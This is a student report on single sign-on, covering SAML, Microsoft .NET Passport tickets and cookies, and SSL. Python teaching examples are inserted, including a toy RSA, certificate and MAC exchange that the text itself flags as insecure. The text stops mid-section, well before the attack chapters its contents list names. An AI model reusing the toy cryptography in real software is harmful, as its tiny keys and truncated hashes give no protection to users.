microsoft®mdr/teaching/modules04/security/students/…  · web viewpassport takes e-mail address...

Single Sign-on Systems Group: SS5 ID: 667618 658490 607349 655507

Post on 29-Mar-2020

0 views

Category:

Documents


0 download

TRANSCRIPT


Single Sign-on Systems

Group: SS5
ID: 667618, 658490, 607349, 655507


Contents

1 Introduction ........................ 3
2 Single sign-on System ........................ 4
2.1 What is single sign-on ........................ 4
2.2 How does single sign-on work? ........................ 4
2.3 Password synchronization vs. single sign-on ........................ 5
3 SAML single sign-on ........................ 7
3.1 What is SAML ........................ 7
3.2 How does it work ........................ 7
3.3 What is SAML composed of ........................ 9
4 .NET Passport ........................ 11
4.1 Registration Process ........................ 11
4.1.1 Information Stored in a .NET Passport ........................ 12
4.1.2 Unique Identifiers ........................ 12
4.1.3 Captcha: telling humans from computers ........................ 13
4.1.4 E-mail Validation ........................ 14
4.2 Authentication Process ........................ 14
4.2.1 Cookies written by Passport ........................ 15
4.2.2 Navigating to another Participating Site ........................ 16
4.2.3 Passport Sign-in and Sign-out ........................ 16
4.3 Secure Sockets Layer (SSL) ........................ 16
4.3.1 Public Key Cryptography for Authentication ........................ 17
4.3.2 Digital Signatures ........................ 17
4.3.3 Certificate Mechanism ........................ 18
4.3.4 Potential attack ........................ 19
4.3.5 Message Authentication Code (MAC) ........................ 19
5 MS Passport security weaknesses ........................ 20
5.1 Cookies problem ........................ 20
5.2 Key management ........................ 20
5.3 Passport server attack ........................ 21
5.4 Hotmail credential assignment ........................ 21
6 Attacks on MS Passport ........................ 22
6.1 Fake merchant attack ........................ 22
6.2 Active attack ........................ 23
6.3 DNS attack ........................ 24
6.4 Cookies attack ........................ 25
7 Advantages of Passport ........................ 28
8 Business use (MS Passport) ........................ 29
8.1 Business use of Passport ........................ 29
8.2 Business benefits of Passport ........................ 29
9 About the Liberty Alliance ........................ 30
10 Conclusion ........................ 31
Bibliography ........................ 32


1 Introduction

It is very common for people to shop on the web or to use Internet banking. Because of the security risk, online vendors usually require the client to authenticate with a username and a password. A problem arises at this point: users end up with a different username and password for each account. Remembering all of them is difficult, and writing them down is not a good solution for security reasons.

An ideal solution to this problem is for a user to need only a single username and password in order to be authenticated by multiple services. Single sign-on is a way to achieve this. Single sign-on is the term used for a system in which users need remember only one username and password, and authentication is then provided for multiple services.

In the following report, what a single sign-on system is and how it works will be illustrated in detail. Two examples of single sign-on systems, SAML and Microsoft Passport, will be introduced. In the conclusion the advantages and disadvantages of single sign-on systems will be discussed.


2 Single sign-on System

2.1 What is single sign-on

Single sign-on is a mechanism that lets "users sign onto a site only once and are given access to one or more applications in a single domain or across multiple domains." i It can be described in two different scopes: the client/server relationship and the e-commerce domain.

1) "In any client/server relationship, single sign-on is a session/user authentication process that permits a user to enter one name and password in order to access multiple applications." ii

When the session is initiated, single sign-on is requested. Once the user has passed authentication, the user is authenticated to all the partner domains, and no further authentication prompts appear when the user switches applications during that session.

2) "In e-commerce, the single sign-on (sometimes referred to as SSO) is designed to centralize consumer financial information on one server - not only for the consumer's convenience, but also to offer increased security by limiting the number of times the consumer enters credit card numbers or other sensitive information used in billing." iii Microsoft's "Passport" single sign-on service (averaging over 40 million consumers and more than 400 authentications per second) uses the wallet protocol to store users' financial information.

2.2 How does single sign-on work?

When the user requests a resource from the server, the server collects the access-control lists (ACLs) associated with that resource and evaluates them. If the evaluation of the ACLs requires the user to be identified, the server requests client authentication. Client authentication can be achieved in many different ways; one possible solution is to use the Secure Sockets Layer (SSL) protocol, which is a way of transmitting private data (such as user information or credit card numbers) over the Internet. SSL uses public-key cryptography during its handshake to authenticate the server (and, optionally, the client, by certificate) and to agree on a session key; the data transferred over the SSL connection is then encrypted with that symmetric session key. (Microsoft Passport instead carries the user's authentication ticket in cookies; this is described in detail in section 4.) After the server has established the user's identity, optionally including user/group information stored in a Lightweight Directory Access Protocol (LDAP) directory, it continues its evaluation of the ACLs and authorizes or denies access to the requested information according to the user's access privileges. Figure 1 illustrates the basic elements of the ACL evaluation process.

Figure 1    Single sign-on uses certificate-based authentication


In the client-authentication step of Figure 1 the SSL client certificate replaces the password. The certificate is presented over the network during the SSL handshake, and the client proves possession of the matching private key; the certificate itself is not a secret, the private key is. Therefore, once the user has logged in once and obtained a certificate, client authentication to the other domains can be done with that same certificate. Because the certificate is signed by its issuer, no other party can alter it without invalidating the signature, and it can be sent from domain to domain over a secure channel. The certificate carries the client's identity, the time of issue and the validity period. When the validity period has passed, a new client authentication is required.

2.3 Password synchronization vs. single sign-on

One might think that using the same username and password for every application would solve the multiple-login problem, and password synchronization software has indeed been developed for this purpose. However, this solution does not completely achieve the aim.

"The password synchronization is the process of changing each password for different applications to the same value, so that the user always enters the same password. Once you install password synchronization software, users will enter the same password when they login to any of the synchronized systems, such as to their network, finance system, email, calendar or the mainframe." iv

Although password synchronization partly achieves the effect of single sign-on, compared with a real single sign-on mechanism it is not a complete solution. The comparison between password synchronization and single sign-on is given in the following table.

Comparison of password synchronization with single sign-on

Process
  Password synchronization: simply changes all applications to the same password. The user continues to log in to each application separately, but uses the same password at each login.
  Single sign-on: the user signs in once with a single username and password; client authentication to the other sites is completed by the designated authentication server.

Login times
  Password synchronization: several, depending on how many applications are used.
  Single sign-on: once for all domains.

Managing other credential data
  Password synchronization: manages passwords only; other credential data such as usernames, IP addresses and database names is not managed.
  Single sign-on: uses a specific protocol to manage client authentication.

Weak passwords
  Password synchronization: can only match the policy of the weakest system. For example, if one application supports a maximum password length of four characters, every application in the synchronized group is protected by at most a four-character password.
  Single sign-on: the user does not need to worry about the password policy of each application; all authentication is done by the server and the chosen authentication mechanism.

Security
  Password synchronization: once one application is compromised, all the other applications can be accessed and their sensitive data obtained.
  Single sign-on: sensitive data can be encrypted and sent over the SSL secure channel.

Note that a single sign-on credential is still a single point of compromise; what single sign-on removes is the dependence on the weakest application's password policy and the repeated transmission of the password to every application.


3 SAML single sign-on

3.1 What is SAML

"SAML (Security Assertion Markup Language) is an XML framework for exchanging security information over the Internet." v The security information consists of user authentication, entitlement and attribute information. Different security systems can interoperate through SAML: identity and entitlement information is exchanged between one service and another while each system keeps its own internal security mechanisms. The authentication and authorization mechanisms used with SAML are not new; what SAML defines is an XML structure for the documents that transport security information between services.

3.2 How does it work

Client authentication. Authentication is a core part of the single sign-on mechanism. In SAML, client authentication is done by an identity provider. The identity provider authenticates the user; if authentication succeeds, it issues an authentication assertion as proof that the client has been authenticated. When the user requests access to a service provider, the service provider first checks the authentication assertion and can send it to the identity provider to confirm its authenticity. The identity provider then sends back a confirmation that the assertion is genuine, and on seeing it the service provider allows the client to access its resources. (In practice the service provider trusts an assertion because it can verify the identity provider's digital signature on it, or because it fetched the assertion from the identity provider itself; in either case the assertion's validity period and intended audience, described in 3.3, must still be checked before the assertion is acted on.) Figure 2 shows the client authentication process.

Figure 2 Client authentication process

1. The service provider receives the client's request and forwards it to the identity provider for client authentication.


2. The identity provider authenticates the client, creates the assertion, and passes it back to the service provider.

The following is a sample SAML request sent from a relying party (service provider) to the issuing party (identity provider). It asks for the Employee_ID attribute of the subject rimap in the sun.com security domain:

<samlp:Request ...>
  <samlp:AttributeQuery>
    <saml:Subject>
      <saml:NameIdentifier SecurityDomain="sun.com" Name="rimap"/>
    </saml:Subject>
    <saml:AttributeDesignator AttributeName="Employee_ID"
                              AttributeNamespace="sun.com">
    </saml:AttributeDesignator>
  </samlp:AttributeQuery>
</samlp:Request>

In response, the issuing authority asserts that the subject (S) was authenticated by means (M) at time (T):

<samlp:Response MajorVersion="1" MinorVersion="0"
    RequestID="128.14.234.20.90123456"
    InResponseTo="123.45.678.90.12345678"
    StatusCode="/features/2002/05/Success">
  <saml:Assertion MajorVersion="1" MinorVersion="0"
      AssertionID="123.45.678.90.12345678"
      Issuer="Sun Microsystems, Inc."
      IssueInstant="2002-01-14T10:00:23Z">
    <saml:Conditions NotBefore="2002-01-14T10:00:30Z"
                     NotAfter="2002-01-14T10:15:00Z"/>
    <saml:AuthenticationStatement AuthenticationMethod="Password"
                                  AuthenticationInstant="2001-01-14T10:00:20Z">
      <saml:Subject>
        <saml:NameIdentifier SecurityDomain="sun.com" Name="rimap"/>
      </saml:Subject>
    </saml:AuthenticationStatement>
  </saml:Assertion>
</samlp:Response>

Securing Web Services

To carry security and identity information between the identity provider and the service provider, SAML assertions can be placed in SOAP header blocks. Carried in SOAP header blocks, the assertions can be used as security tokens for service transactions. (The Liberty Alliance's ID-Web Services Framework also uses SAML assertions as the base security token format for enabling secure and privacy-respecting access to identity-based web services.)

"SOAP, which stands for Simple Object Access Protocol, is a lightweight protocol for the exchange of information in a decentralized, distributed environment. It is an XML-based protocol that consists of three parts: an envelope that defines a framework for describing what is in a message and how to process it, a set of encoding rules for expressing instances of application-defined data types, and a convention for representing remote procedure calls and responses. SOAP can potentially be used in combination with a variety of other protocols; the primary transmission protocol is over HTTP." vi

3.3 What is SAML composed of

SAML is composed of distinct but interrelated components: vii

Assertions

Request/response protocols

Bindings (the SOAP-over-HTTP method of transporting SAML requests and responses)

Profiles (for embedding and extracting SAML assertions in a framework or protocol)

Assertions. As illustrated before, assertions are made by the identity provider. An assertion is a package of information that supplies one or more statements. There are three types of assertion statement:

• Authentication: the specified subject was authenticated by a particular means at a particular time.
• Attribute: the specified subject is associated with the supplied attributes.
• Authorization decision: a request to allow the specified subject to access the specified resource has been granted or denied. viii

The outer structure of an assertion is generic and simple, with common elements built in. The information it provides is:

Issuer ID and issuance timestamp
Assertion ID
Subject
  Name and security domain
  Subject's authentication data (optional)
Advice (optional additional information provided by the issuing authority)
Conditions under which the assertion is valid
  Assertion validity period (NotBefore and NotOnOrAfter)
  Audience restrictions
  Target restrictions (intended URLs for the assertion)
  Application-specific conditions

Protocols. Several kinds of protocol are defined in SAML. They allow a service provider to make requests and an identity provider to respond. A service provider can:

• Request one or more assertions (either a direct request for the desired assertions, or a query for assertions that meet particular criteria)
• Request that a principal be authenticated, with the corresponding assertion returned
• Request that a name identifier be registered
• Request that a federation be terminated
• Retrieve a protocol message that has been requested by means of an artifact
• Request a near-simultaneous logout of a collection of related sessions ("single logout")
• Request a name identifier mapping

Bindings. Mappings from SAML request-response message exchanges into standard messaging or communication protocols are called SAML protocol bindings. ix

Profiles. Generally, a profile of SAML defines constraints and/or extensions in support of the usage of SAML for a particular application; the goal is to enhance interoperability by removing some of the flexibility inevitable in a general-usage standard. x


4 .NET Passport

Microsoft® .NET Passport is an implementation of a single sign-on system. It is based on cookies and employs security techniques to prevent attacks. It includes the Passport single sign-in service and the Kids Passport service.

The Passport service simplifies sign-in and registration, allowing easy access without repetitive registrations. In addition, users can store common personal information in their Passport profile.

The Kids Passport service is a business application of .NET Passport that allows parents to manage the profile information of their children.

In this part we call any web site that has joined .NET Passport a participating site.

4.1 Registration Process

Registration is handled by the Passport service. When users register for a Passport, they open a Passport account with a 64-bit Passport User ID, which is the identifier shared with participating sites.

Figure 1: The Registration Process. xi

1. In this example the user browses to Site A, a participating site or service (or browses to www.passport.com), and clicks the "Sign In" button (or clicks the "Register" button on Passport.com).

2. The user is redirected to a co-branded registration page displaying the registration fields chosen by Site A. (The minimum number of fields required is two: e-mail name and password.) Here the user chooses whether or not to opt in to sharing their information with other Passport-enabled sites they sign in to.

3. The user reads and accepts the terms of use (or declines, and the process ends), and submits the form. (On Passport.com the user is shown a congratulations page and the sign-up process ends here.)

4. The user is then redirected back to Site A with their encrypted authentication ticket and profile information attached.

5. Site A decrypts the authentication ticket and profile information and continues its own registration process, or grants access to its site.

NOTES: Sites B and C do not receive any information about the user. The user does not need to download any software.

The minimum information a user must provide when registering is an e-mail address and a password. This password is not the password of the e-mail mailbox; it is used only to authenticate to the Passport service.

4.1.1 Information Stored in a .NET Passport

A .NET Passport account stores not only credential information, such as the e-mail address and password, but also profile data, which is shared between participating sites and the Passport service.

Passport uses the e-mail address as the account name, so when registering the e-mail address and password are the information users must provide. For an extra layer of security, a participating site may require an additional security key at sign-in. In addition, users set three secret questions for use if they forget the security key.

Profile information holds the data users are willing to share. The e-mail address is the one item that is both credential and profile information.

Account Information Chart xii

Information: E-mail address (sign-in name)
  Data type: Credential and Profile
  Required to create a Passport? Yes
  Shared with other sites? If user opts in

Information: Password
  Data type: Credential
  Required to create a Passport? Yes
  Shared with other sites? Never

Information: Security key
  Data type: Credential
  Required to create a Passport? Optional (however, a participating site may require the use of a security key)
  Shared with other sites? Never

Information: Birth date, Country/Region, First name, Gender, Last name, Occupation, Postal code, Preferred language, State, Time zone
  Data type: Profile
  Required to create a Passport? Optional; which fields are used is determined by the site that registers the user
  Shared with other sites? If user opts in


4.1.2 Unique Identifiers

On successful registration each account is assigned a 64-bit unique identifier, the Passport User ID (PUID). The PUID is sent, encrypted, to the participating site as the authentication credential when a Passport user signs in. Because it is up to the user whether to share their e-mail address and other information, sites cannot depend on that kind of information to identify the user; the PUID is the stable identifier.

4.1.3 Captcha: telling humans from computers

The .NET Passport service employs Captcha technology, which asks registrants to type in the alphanumeric characters shown in a picture, to tell humans from computers.

Figure 2: Telling humans from computers.

Attackers can easily submit thousands of fake registrations a minute with a program, overwhelming the capacity of the registration system and taking the service offline.

Captcha stands for "Completely Automated Public Turing Test to Tell Computers and Humans Apart." xiii

The Captcha test arose in November 1999, when students at Carnegie Mellon and at MIT wrote voting "bot" programs to win an online poll asking which was the best graduate school in computer science. Such attacks can also occur in account registration and e-mail sending. The Captcha test relies on the human ability to read distorted and corrupted text, which computer programs could not match when the test was devised. Captcha works by choosing a number of alphanumeric characters, displaying them corrupted and distorted in an image, and asking the user to type the characters shown. Human users have no problem typing the characters displayed, while the bots of the time were unable to do the same.


4.1.4 E-mail Validation

In the last step of registration, the e-mail address registered with Passport has to be verified. The Passport service sends a welcome e-mail message informing the user about the service. By clicking the appropriate link in the e-mail, the user can either validate the account or cancel it. This step prevents e-mail addresses from being used in Passport accounts without the permission of the true owner of the address, which would cause confusion and inconvenience for both the consumer and the participating site.
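A worked example of how validate and cancel links can be built so that only the recipient of the message can act on them, and so that one link cannot be turned into the other. This is an added example in Python, not Passport's own code; the URL, the server key, the link lifetime, the query-parameter names and the in-memory record of used links are assumptions made for the example.

```python
"""Signed, expiring, purpose-bound e-mail validation links (added example).

Assumed design: each link carries the address, an expiry, a random nonce and
an HMAC over (purpose, address, expiry, nonce). The purpose is inside the MAC,
so a validate link cannot be replayed as a cancel link or vice versa, and the
nonce is consumed on first use so a link works only once.
"""
import hashlib
import hmac
import secrets
import time
from urllib.parse import parse_qs, urlencode, urlsplit

SERVER_KEY = b"constructed-example-key"      # assumption: in practice a random key from a secret store
LINK_TTL = 3 * 24 * 3600                      # assumption: links expire after three days
VALIDATE_URL = "https://passport.example/validate"  # assumed endpoint, not a real Passport URL
_used_nonces = set()                          # single use; a real service persists this


def _sign(purpose, email, expires, nonce):
    msg = b"\x00".join([purpose.encode(), email.encode(), str(expires).encode(), nonce.encode()])
    return hmac.new(SERVER_KEY, msg, hashlib.sha256).hexdigest()


def make_links(email, now=None):
    """Return (validate_url, cancel_url) to embed in the welcome message."""
    now = int(time.time() if now is None else now)
    expires = now + LINK_TTL
    nonce = secrets.token_urlsafe(16)   # shared by the pair: acting on one voids the other
    urls = {}
    for purpose in ("validate", "cancel"):
        query = {"a": purpose, "e": email, "x": expires, "n": nonce,
                 "s": _sign(purpose, email, expires, nonce)}
        urls[purpose] = VALIDATE_URL + "?" + urlencode(query)
    return urls["validate"], urls["cancel"]


def handle_link(url, now=None):
    """Server side. Return (purpose, email) for a genuine, unexpired, unused link,
    or None when the link is forged, altered, expired or already used."""
    now = int(time.time() if now is None else now)
    params = {k: v[0] for k, v in parse_qs(urlsplit(url).query).items()}
    try:
        purpose, email = params["a"], params["e"]
        expires, nonce, sig = int(params["x"]), params["n"], params["s"]
    except (KeyError, ValueError):
        return None
    if purpose not in ("validate", "cancel"):
        return None
    # Constant-time comparison: the MAC check must not leak how many bytes matched.
    if not hmac.compare_digest(sig, _sign(purpose, email, expires, nonce)):
        return None
    if now > expires or nonce in _used_nonces:
        return None
    _used_nonces.add(nonce)
    return purpose, email


if __name__ == "__main__":
    validate, cancel = make_links("alice@example.org")
    print(handle_link(validate))   # ('validate', 'alice@example.org')
    print(handle_link(cancel))     # None: the pair's nonce is already consumed
```

The point the section makes is that the mailbox owner, and nobody else, decides; the link design enforces it by making the decision unforgeable (MAC over the address and purpose), bounded in time (expiry) and final (nonce consumed), without the server keeping any per-link state beyond the list of used nonces.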

4.2 Authentication Process

Passport authentication messages take the form of electronic "tickets" carried in cookies; with such a ticket users are authorized to access pages on participating sites.

The Passport service separates the participating site's user interface from the Passport service domain. As in the registration process, after clicking the standard Passport sign-in link the user is redirected to the sign-in page on Passport.com. Once the user is verified, Passport writes a cookie, the "ticket-granting cookie", to the user's browser. This cookie is used as the electronic "ticket" in subsequent accesses. Passport then redirects the browser back to the participating site.

Figure 3: The Passport Authentication Process xiv


1. The user browses to a participating site or service (Site A in this example) and clicks the "Sign In" button or link.

2. The user is redirected to Passport.

3. Passport checks whether the user has a "Ticket Granting Cookie" (TGT) in their browser's cookie file, one that meets the rules Site A has set. If one is detected the user skips to step 4 and never sees the Passport login UI. If the TGT does not satisfy the time-since-sign-in rule requested by Site A, Passport removes the information that Site A passed on the query string and redirects the user to a page that asks for the currently signed-in user's password. This page has a short URL in the passport.net domain. If the user enters the correct information, they proceed.

4. The user is redirected back to Site A with their encrypted authentication ticket and profile information attached (if the user has chosen to share it, and if it is present).

5. Site A decrypts the authentication ticket and profile information, and signs the customer into its site.

6. The user accesses the page, resource, or service they requested from Site A.

NOTE: Sites B and C do not receive any information in this process. No information about a user is shared with Sites B and C unless the user chooses to sign in at those sites.
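A worked example of the two decisions in steps 3 and 5 above, written in Python as an added example; it is not Passport's code. The login server decides from the ticket-granting cookie's last-manual-sign-in timestamp whether to sign the user in silently, ask for the password again, or show the full login page, according to a time-since-sign-in rule set by Site A; the participating site then checks the ticket it receives. The policy structure and field names, the use of HMAC-SHA256 for integrity in place of Passport's encryption of the ticket with the site's shared key, and the key-version check are assumptions made for the example.

```python
"""Passport-style ticket handling (added example, not Passport's code).

evaluate_tgt   : the login server's decision in step 3.
issue_site_ticket / verify_site_ticket : the ticket Site A receives in step 5.
Assumptions: a per-site policy dict, UNIX-time timestamps, HMAC-SHA256 for
integrity instead of encryption, and a key_version field in the ticket.
"""
import base64
import hashlib
import hmac
import json

# Assumed Site A policy: re-ask for the password when the last manual sign-in
# is older than one hour (Passport's real parameter name is not on the page).
SITE_A_POLICY = {"site_id": 1234, "max_age_since_manual_signin": 3600}


def evaluate_tgt(tgt, policy, now):
    """Login-server decision when the browser presents a ticket-granting cookie.

    tgt: None, or a dict with 'puid', 'last_manual_signin', 'last_refresh'.
    Returns 'login'  (no usable TGT: show the sign-in page),
            'reauth' (TGT present but too old for this site: ask for the password),
            'silent' (skip the UI and redirect back with a fresh ticket).
    """
    if tgt is None:
        return "login"
    age = now - tgt["last_manual_signin"]
    if age < 0 or age > policy["max_age_since_manual_signin"]:
        return "reauth"
    return "silent"


def _mac(key, data):
    return hmac.new(key, data, hashlib.sha256).digest()


def issue_site_ticket(tgt, site_key, key_version, now):
    """Mint the ticket the browser carries back to the participating site.

    The timestamps come from the TGT (last manual sign-in) and the login server
    (last refresh), as in the MSPAuth cookie; key_version lets the site detect a
    ticket minted under a retired key.
    """
    body = {
        "puid": tgt["puid"],
        "last_manual_signin": tgt["last_manual_signin"],
        "last_refresh": now,
        "key_version": key_version,
    }
    raw = json.dumps(body, sort_keys=True, separators=(",", ":")).encode()
    return base64.urlsafe_b64encode(raw + _mac(site_key, raw)).decode()


def verify_site_ticket(cookie, site_key, expected_key_version, policy, now):
    """Participating-site check. Return the PUID, or None when the ticket is
    tampered with, minted under another key version, or stale for this site."""
    try:
        blob = base64.urlsafe_b64decode(cookie.encode())
    except ValueError:
        return None
    raw, tag = blob[:-32], blob[-32:]
    if not hmac.compare_digest(tag, _mac(site_key, raw)):
        return None                       # forged, tampered or wrong site key
    body = json.loads(raw)
    if body.get("key_version") != expected_key_version:
        return None                       # site key was rolled: force a new sign-in
    if now - body["last_manual_signin"] > policy["max_age_since_manual_signin"]:
        return None                       # the site applies its own freshness rule too
    return body["puid"]


if __name__ == "__main__":
    now = 1_000_000
    tgt = {"puid": 0x1122334455667788, "last_manual_signin": now - 600, "last_refresh": now - 60}
    print(evaluate_tgt(tgt, SITE_A_POLICY, now))          # silent
    print(evaluate_tgt(tgt, SITE_A_POLICY, now + 7200))   # reauth
    cookie = issue_site_ticket(tgt, b"site-a-shared-key", 3, now)
    print(verify_site_ticket(cookie, b"site-a-shared-key", 3, SITE_A_POLICY, now))
```

The site-side re-check of the timestamp matters because the login server's decision is made at redirect time; a ticket captured from the browser later should not be accepted for longer than the site's own rule allows.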

4.2.1 Cookies written by Passport

Passport uses cookies as the electronic ticket that lets users move from page to page without signing in again and again. Note that if the user's browser does not support cookies, the Passport service will not work.

The cookies holding credentials are encrypted with the Passport key and written only to the Passport authority domain; a participating site cannot read them directly. The ticket-granting cookie in particular carries the user's PUID and password for silent sign-in, so its protection rests on that encryption, on HTTPS and on the browser's cookie store (the cookie-related weaknesses are discussed in section 5.1).

Cookie Table xv

MSPAuth (Ticket)
  Encrypted with the Passport key. Contains the Passport timestamps (last refresh and last manual sign-in), the saved-password flag, key version verification and any flags set by network servers.

MSPProf (Profile)
  Encrypted with the Passport key. Contains each of the core profile attributes, if they are present and the user has chosen to share them.

MSPSec (Ticket-Granting Cookie)
  Sent via HTTPS for all browsers that allow HTTPS cookie writes. Contains the SSL-encoded PUID and password, used for silent sign-in.

MSPVis (Participating sites cookie)
  Each new Passport participating site visited by the user has its site ID written to this cookie. Used by the login server to compile the list of sites that must be signed out from when the user clicks any Sign Out link. No encryption.


The other cookies, which carry the ticket and profile information, are encrypted with the participating site's key and written to the participating site's own domain. These cookies keep the user signed in at that participating site for the rest of the browser session.

MSPAuth (Ticket)
  Encrypted with the participating site's Passport key. Contains the Passport timestamps (last refresh and last manual sign-in), the saved-password flag, key version verification, and other flags.

MSPProf (Profile)
  Encrypted with the participating site's Passport key. Contains each of the core profile attributes, if they are present and the user has chosen to share them.

MSPSecAuth (SSL Channel)
  Sent via HTTPS for all browsers that allow HTTPS cookie writes. Used to indicate that the participating site is using the SSL channel feature.

4.2.2 Navigating to another Participating Site

Passport is literally a passport: an authentication that lets the holder go wherever they are authorized. .NET Passport issues an electronic "ticket" in the form of a cookie; while the ticket is valid the user can move from page to page, and even to another participating site, without re-entering credentials. On arrival at another participating site the user is redirected to the Passport server exactly as at the first sign-in, but the server now finds the ticket-granting cookie already in the browser. If the timestamps it carries are fresh enough for that site's requirements, the user is not asked for the password again; the server simply writes new encrypted ticket and profile cookies for the new site into the browser.

4.2.3 Passport Sign-in and Sign-out

Visiting each participating site, the user signs in through a co-branded sign-in page (Figure 4). Two check boxes on this page change how sign-in behaves. If the user ticks "I'm using a public computer", Passport will not pre-fill the e-mail address the next time the user signs in from that machine. If the user ticks "Sign me in automatically", Passport stores a persistent cookie that stands in for retyping the e-mail address and password, so the user will not see the Passport sign-in page again and can use participating sites without typing anything until they click the Passport Sign Out logo. Normally, when the user signs out by clicking that logo, all Passport cookies set by all participating sites during the browser session are deleted from the computer.

4.3 Secure Sockets Layer (SSL)

SSL, short for Secure Sockets Layer, is a protocol developed by Netscape for transmitting private data over the Internet. SSL uses public-key cryptography to authenticate the server (and optionally the client) and to agree a session key, and then protects the data on the connection with a symmetric cipher under that key. Both Netscape Navigator and Internet Explorer support SSL, and many Web sites use it to collect confidential user information or to authenticate registered users. By convention, URLs that require an SSL connection start with https: instead of http:.

4.3.1 Public Key Cryptography for Authentication

Public-key encryption is a cryptographic system that uses two keys: a public key known to everyone and a private (secret) key known only to its owner. It is computationally infeasible to derive the private key from the public key.

In the authentication step the service sends the user a random message (a challenge). The user encrypts the received message with his or her private key and returns the result. Assuming the user has already handed the public key to the service (see "Certificate Mechanism" below), the service decrypts the response with that public key; if the result matches the original random message, the user is authenticated, because an impostor would not know the user's private key and so could not have produced the correct response.

Figure 5: Public Key Cryptography for Authentication.

In this example Alice plays the role of the service server and Bob is a registered user who has already disclosed his public key to Alice. {Random msg}Bob's private key denotes the message encrypted with Bob's private key.

    Alice --> Bob   Random msg
    Bob --> Alice   {Random msg} Bob's private key

4.3.2 Digital Signatures

Nobody should encrypt an unknown message with a private key and hand the result to someone else, because the signer is then answerable for whatever that value turns out to mean: a party who can choose the challenge could make the user sign something useful to the attacker. To reduce that risk, the user instead constructs a one-way message digest and signs that. An impersonator has difficulty finding a different message that produces the same digest value, while the server can recompute the digest, decrypt the user's signed digest with the user's public key and compare the two values. This technique, which SSL uses, is known as a digital signature. When responding, the user generates his own message, computes its digest, and sends the message together with the encrypted digest to the server.

Figure 6: Digital Signature.

Bob generates his own message, constructs a digest from it, and sends the message with its encrypted digest to Alice.

    Alice --> Bob   hello, are you Bob?
    Bob --> Alice   Alice, This Is Bob  {digest[Alice, This Is Bob]} Bob's private key

4.3.3 Certificate Mechanism

How can a user hand out a public key securely? Delivering it physically would be the most secure way, but that does not scale to the Internet, so SSL relies on certificates.

A certificate contains the following information: xvi

    • The name of the certificate issuer.
    • The entity for whom the certificate is issued (the subject).
    • The public key of the subject.
    • Validity time stamps.

The certificate is signed with the private key of the issuer. Certificates are the standard method of binding a public key to a name. Using a certificate, the service server can check whether the certificate presented by the user is genuine: the signature verifies under the issuer's public key only if the issuer really signed exactly those contents.

    Alice --> Bob   hello
    Bob --> Alice   Hi, I'm Bob, Bob's certificate
    Alice --> Bob   prove it
    Bob --> Alice   Alice, This Is Bob  {digest[Alice, This Is Bob]} Bob's private key

After authentication succeeds, the party that verified the certificate (Alice in the figure) generates a secret, encrypts it with the other party's public key and sends it over; the secret then becomes the key of a symmetric cipher that protects the rest of the session.

    Alice --> Bob   {secret} Bob's public key
    Bob --> Alice   {some message} secret key


4.3.4 Potential attack

Figure 7: Security Interference

Bob and Alice's communication may be observed by an attacker, Mallory, sitting between them. Mallory can pass most traffic back and forth unchanged but garble certain messages. If the messages are only encrypted and not authenticated, the receiver has no way to tell garbled ciphertext from genuine ciphertext, and with enough tries Mallory may even get lucky and produce a ciphertext that decrypts to a valid message.

4.3.5 Message Authentication Code (MAC)

To defeat this attack SSL adds a 128-bit MAC to every record. A message authentication code is a value computed from a shared secret and the transmitted data:

    MAC := digest[some_message, secret]

Putting the whole exchange together:

    Alice --> Bob   hello
    Bob --> Alice   Hi, I'm Bob, Bob's certificate
    Alice --> Bob   prove it
    Bob --> Alice   Alice, This Is Bob  {digest[Alice, This Is Bob]} Bob's private key
    Alice --> Bob   ok Bob, here is a secret  {secret} Bob's public key
    Bob --> Alice   {some message, MAC} secret key

If Mallory garbles a message, the MAC no longer matches the data, which reveals that the message did not arrive unmodified from Bob; Alice and Bob detect the bad MAC and stop communicating. In this way SSL provides a secure channel between server and user through certificates, digital signatures and MACs.


Figure 7 exchange:

    Bob --> Mallory    {some message} secret key
    Mallory --> Alice  garble[{some message} secret key]
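The exchange in 4.3.1 to 4.3.5, as an added, runnable example that is not part of the original report and not SSL itself: a toy CA certifies Bob's public key, Alice checks the certificate, Bob proves possession of his private key by signing a digest, Alice sends a secret under Bob's public key, and the record that follows carries a MAC that exposes Mallory's garbling. It uses only the Python standard library. RSA is textbook with small fixed Mersenne primes, SHA-256 is truncated to 88 bits so values fit the toy moduli, and HMAC-SHA256 in counter mode stands in for the record cipher; all of that is for readability and none of it is secure. The random nonce in the challenge, the CA name and the validity numbers are assumptions added here; the nonce goes beyond the figures in the report because without it a recorded response could be replayed.

```python
import hashlib
import hmac
import secrets

E = 65537
P_BOB, Q_BOB = 2**31 - 1, 2**61 - 1    # Mersenne primes M31, M61: toy sizes, insecure
P_CA, Q_CA = 2**89 - 1, 2**107 - 1     # M89, M107 for the toy issuer


def make_keypair(p, q):
    n = p * q
    return (n, E), (n, pow(E, -1, (p - 1) * (q - 1)))   # (public, private)


def digest(data: bytes) -> int:
    # 88-bit truncation keeps the value below every toy modulus above
    return int.from_bytes(hashlib.sha256(data).digest()[:11], "big")


def sign(msg: bytes, priv) -> int:            # {digest[msg]} private-key
    n, d = priv
    return pow(digest(msg), d, n)


def verify(msg: bytes, sig: int, pub) -> bool:
    n, e = pub
    return pow(sig, e, n) == digest(msg)


def tbs(cert: dict) -> bytes:                 # the to-be-signed part of a certificate
    return repr(sorted((k, v) for k, v in cert.items() if k != "sig")).encode()


def issue_cert(issuer, issuer_priv, subject, subject_pub, not_before, not_after):
    cert = {"issuer": issuer, "subject": subject, "pub": subject_pub,
            "not_before": not_before, "not_after": not_after}
    cert["sig"] = sign(tbs(cert), issuer_priv)
    return cert


def cert_ok(cert, trusted_ca: dict, now) -> bool:
    issuer_pub = trusted_ca.get(cert["issuer"])          # unknown issuer: reject
    return (issuer_pub is not None
            and cert["not_before"] <= now <= cert["not_after"]
            and verify(tbs(cert), cert["sig"], issuer_pub))


def session_key(secret: int) -> bytes:
    return hashlib.sha256(secret.to_bytes(32, "big")).digest()


def xor_stream(key: bytes, data: bytes) -> bytes:
    # HMAC-SHA256 in counter mode stands in for the record cipher
    ks = b"".join(hmac.new(key, i.to_bytes(4, "big"), hashlib.sha256).digest()
                  for i in range(len(data) // 32 + 1))
    return bytes(a ^ b for a, b in zip(data, ks))


def seal(key: bytes, msg: bytes) -> bytes:    # {msg, MAC} secret-key
    return xor_stream(key, msg) + hmac.new(key, msg, hashlib.sha256).digest()


def open_sealed(key: bytes, record: bytes):
    msg = xor_stream(key, record[:-32])
    if not hmac.compare_digest(record[-32:], hmac.new(key, msg, hashlib.sha256).digest()):
        return None                           # garbled in transit: reject and stop talking
    return msg


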